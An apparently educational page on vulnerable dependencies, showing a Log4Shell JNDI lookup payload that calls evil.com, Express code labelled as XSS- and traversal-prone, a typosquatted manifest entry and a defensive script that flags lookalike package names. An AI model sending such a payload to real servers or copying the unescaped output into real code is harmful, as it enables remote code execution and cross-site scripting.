🚨 Vulnerable Dependencies

Common vulnerable packages and supply chain attacks

⚠️ WARNING: This page demonstrates vulnerable dependencies for educational purposes only.
These examples show common vulnerabilities found in popular packages.

📦 Log4j Vulnerability (CVE-2021-44228)

Demonstrating the infamous Log4Shell vulnerability:

📦 Express.js Vulnerabilities

Common vulnerabilities in Express.js framework:

📦 Supply Chain Attacks

Demonstrating supply chain attack techniques:

// 🚨 Vulnerable Dependencies (Educational Only)

// Log4j Vulnerability (CVE-2021-44228)
${jndi:ldap://evil.com/exploit}

// Express.js vulnerable code
app.use(express.static('public')); // Directory traversal

app.get('/user/:id', (req, res) => {
  res.send('User: ' + req.params.id); // XSS vulnerable
});

// Malicious package in package.json
{
  "dependencies": {
    "legitimate-package": "1.0.0",
    "legitimate-package-typo": "1.0.0" // Typosquatting
  }
}
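
The typosquatting entry in the manifest above can be caught by comparing dependency names against a list of packages you actually intend to use. The following is an added example, not code from the original page; the trusted list, the sample manifest and the function names (`editDistance`, `squash`, `findLookalikes`) are assumptions made for illustration.

```javascript
// Added example. TRUSTED and sampleManifest are constructed for illustration.
const TRUSTED = ['legitimate-package', 'express', 'lodash'];

// Classic Levenshtein edit distance (two-row dynamic programming).
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Strip separators so "lo-dash" and "lo_dash" compare equal to "lodash".
const squash = (name) => name.toLowerCase().replace(/[-_.]/g, '');

// Returns [{ name, resembles, reason }] for every dependency that is not
// on the trusted list but looks like a variant of a name that is.
function findLookalikes(manifest, trusted = TRUSTED) {
  const deps = { ...manifest.dependencies, ...manifest.devDependencies };
  const findings = [];
  for (const name of Object.keys(deps)) {
    if (trusted.includes(name)) continue; // exact match is fine
    for (const good of trusted) {
      let reason = null;
      if (squash(name) === squash(good)) reason = 'separator variant';
      else if (name.startsWith(good + '-') || name.endsWith('-' + good)) reason = 'affix on trusted name';
      else if (editDistance(name, good) <= 2) reason = 'edit distance <= 2';
      if (reason) { findings.push({ name, resembles: good, reason }); break; }
    }
  }
  return findings;
}

// Constructed sample: the page's manifest plus two more lookalikes.
const sampleManifest = {
  dependencies: {
    'legitimate-package': '1.0.0',
    'legitimate-package-typo': '1.0.0',
    'expres': '4.18.2',
    'lo-dash': '4.17.21',
    'left-pad': '1.3.0',
  },
};
console.log(findLookalikes(sampleManifest));
```

A finding is a prompt for manual review, not a verdict: the affix rule also matches legitimate companion packages whose names extend a trusted name.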